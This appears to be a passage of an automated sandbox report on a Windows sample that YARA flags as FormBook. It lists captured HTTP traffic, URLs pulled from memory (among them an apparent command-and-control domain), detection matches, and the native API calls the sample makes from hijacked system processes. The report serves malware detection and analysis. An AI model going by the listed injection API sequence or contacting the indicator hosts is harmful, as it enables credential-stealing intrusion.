63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 7d 0d 0a 70 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 7d 0d 0a 2e 65 78 70 6c 61 69 6e 20 7b 0d 0a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 01:51:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 01:51:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 01:51:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Mar 2025 01:51:41 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                Source: oss4CtI8oz.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: oss4CtI8oz.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: svchost.exe, 0000000A.00000002.2851659282.00000266E4484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: qmgr.db.10.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: DzuG1v7KGGzqI4w.exe, 00000009.00000002.3340314357.0000000003C6C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ibm-p8-kvm-03-guest-02.virt.pnr.lab.eng.rdu2.redhat.com/
                Source: oss4CtI8oz.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: oss4CtI8oz.exe, 00000000.00000002.942384571.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: oss4CtI8oz.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                Source: DzuG1v7KGGzqI4w.exe, 00000009.00000002.3342147165.0000000004A89000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jingdongpt.shop
                Source: DzuG1v7KGGzqI4w.exe, 00000009.00000002.3342147165.0000000004A89000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jingdongpt.shop/j64s/
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: finger.exe, 00000007.00000002.3340993158.0000000004FCE000.00000004.10000000.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000002.3340314357.0000000003DFE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ad.netowl.jp/js/star-errorpage.js?date=
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: finger.exe, 00000007.00000002.3340993158.0000000003CF6000.00000004.10000000.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000002.3340314357.0000000002B26000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://error.skycloud.tw/system/error?code=400
                Source: edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                Source: svchost.exe, 0000000A.00000003.1203352382.00000266E42C0000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: finger.exe, 00000007.00000002.3337828652.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: finger.exe, 00000007.00000002.3337828652.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: finger.exe, 00000007.00000003.1255366123.0000000007AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: finger.exe, 00000007.00000002.3337828652.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: finger.exe, 00000007.00000002.3337828652.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033)
                Source: finger.exe, 00000007.00000002.3337828652.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: finger.exe, 00000007.00000002.3337828652.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: oss4CtI8oz.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: finger.exe, 00000007.00000002.3340993158.0000000004FCE000.00000004.10000000.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000002.3340314357.0000000003DFE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.star.ne.jp/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1067799190.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3337490870.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3336839914.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3337645809.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1066763202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3342147165.00000000049E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3339789952.0000000002C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1074125583.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042CE23 NtClose,4_2_0042CE23
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392B60 NtClose,LdrInitializeThunk,4_2_01392B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01392DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01392C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013935C0 NtCreateMutant,LdrInitializeThunk,4_2_013935C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01394340 NtSetContextThread,4_2_01394340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01394650 NtSuspendThread,4_2_01394650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392BA0 NtEnumerateValueKey,4_2_01392BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392B80 NtQueryInformationFile,4_2_01392B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392BF0 NtAllocateVirtualMemory,4_2_01392BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392BE0 NtQueryValueKey,4_2_01392BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392AB0 NtWaitForSingleObject,4_2_01392AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392AF0 NtWriteFile,4_2_01392AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392AD0 NtReadFile,4_2_01392AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392D30 NtUnmapViewOfSection,4_2_01392D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392D10 NtMapViewOfSection,4_2_01392D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392D00 NtSetInformationFile,4_2_01392D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392DB0 NtEnumerateKey,4_2_01392DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392DD0 NtDelayExecution,4_2_01392DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392C00 NtQueryInformationProcess,4_2_01392C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392C60 NtCreateKey,4_2_01392C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392CA0 NtQueryInformationToken,4_2_01392CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392CF0 NtOpenProcess,4_2_01392CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392CC0 NtQueryVirtualMemory,4_2_01392CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392F30 NtCreateSection,4_2_01392F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392F60 NtCreateProcessEx,4_2_01392F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392FB0 NtResumeThread,4_2_01392FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392FA0 NtQuerySection,4_2_01392FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392F90 NtProtectVirtualMemory,4_2_01392F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392FE0 NtCreateFile,4_2_01392FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392E30 NtWriteVirtualMemory,4_2_01392E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392EA0 NtAdjustPrivilegesToken,4_2_01392EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392E80 NtReadVirtualMemory,4_2_01392E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392EE0 NtQueueApcThread,4_2_01392EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01393010 NtOpenDirectoryObject,4_2_01393010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01393090 NtSetValueKey,4_2_01393090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013939B0 NtGetContextThread,4_2_013939B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01393D10 NtOpenProcessToken,4_2_01393D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01393D70 NtOpenThread,4_2_01393D70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C4340 NtSetContextThread,LdrInitializeThunk,7_2_031C4340
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C4650 NtSuspendThread,LdrInitializeThunk,7_2_031C4650
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2B60 NtClose,LdrInitializeThunk,7_2_031C2B60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_031C2BA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_031C2BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_031C2BE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2AD0 NtReadFile,LdrInitializeThunk,7_2_031C2AD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2AF0 NtWriteFile,LdrInitializeThunk,7_2_031C2AF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2F30 NtCreateSection,LdrInitializeThunk,7_2_031C2F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2FB0 NtResumeThread,LdrInitializeThunk,7_2_031C2FB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2FE0 NtCreateFile,LdrInitializeThunk,7_2_031C2FE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_031C2E80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_031C2EE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_031C2D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_031C2D30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2DD0 NtDelayExecution,LdrInitializeThunk,7_2_031C2DD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_031C2DF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_031C2C70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2C60 NtCreateKey,LdrInitializeThunk,7_2_031C2C60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_031C2CA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C35C0 NtCreateMutant,LdrInitializeThunk,7_2_031C35C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C39B0 NtGetContextThread,LdrInitializeThunk,7_2_031C39B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2B80 NtQueryInformationFile,7_2_031C2B80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2AB0 NtWaitForSingleObject,7_2_031C2AB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2F60 NtCreateProcessEx,7_2_031C2F60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2F90 NtProtectVirtualMemory,7_2_031C2F90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2FA0 NtQuerySection,7_2_031C2FA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2E30 NtWriteVirtualMemory,7_2_031C2E30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2EA0 NtAdjustPrivilegesToken,7_2_031C2EA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2D00 NtSetInformationFile,7_2_031C2D00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2DB0 NtEnumerateKey,7_2_031C2DB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2C00 NtQueryInformationProcess,7_2_031C2C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2CC0 NtQueryVirtualMemory,7_2_031C2CC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2CF0 NtOpenProcess,7_2_031C2CF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C3010 NtOpenDirectoryObject,7_2_031C3010
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C3090 NtSetValueKey,7_2_031C3090
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C3D10 NtOpenProcessToken,7_2_031C3D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C3D70 NtOpenThread,7_2_031C3D70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_00879790 NtCreateFile,7_2_00879790
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_00879900 NtReadFile,7_2_00879900
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_00879AB0 NtClose,7_2_00879AB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_00879A00 NtDeleteFile,7_2_00879A00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_00879C10 NtAllocateVirtualMemory,7_2_00879C10
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeCode function: 0_2_012F3E400_2_012F3E40
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeCode function: 0_2_012F6F920_2_012F6F92
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeCode function: 0_2_012FDE6C0_2_012FDE6C
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeCode function: 0_2_072CBF2D0_2_072CBF2D
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeCode function: 0_2_0730A7280_2_0730A728
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeCode function: 0_2_0730B4380_2_0730B438
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeCode function: 0_2_073094880_2_07309488
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeCode function: 0_2_0730901F0_2_0730901F
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeCode function: 0_2_073090500_2_07309050
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeCode function: 0_2_0730AB600_2_0730AB60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00418C734_2_00418C73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004014F04_2_004014F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004030F04_2_004030F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004012004_2_00401200
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004104134_2_00410413
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004044F74_2_004044F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042F4A34_2_0042F4A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004025604_2_00402560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040E6434_2_0040E643
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004106334_2_00410633
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00416E834_2_00416E83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040E7904_2_0040E790
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040E7934_2_0040E793
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013FA1184_2_013FA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013501004_2_01350100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E81584_2_013E8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014181CC4_2_014181CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014201AA4_2_014201AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F20004_2_013F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141A3524_2_0141A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014203E64_2_014203E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136E3F04_2_0136E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014002744_2_01400274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E02C04_2_013E02C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013605354_2_01360535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014205914_2_01420591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014124464_2_01412446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0140E4F64_2_0140E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013607704_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013847504_2_01384750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135C7C04_2_0135C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137C6E04_2_0137C6E0
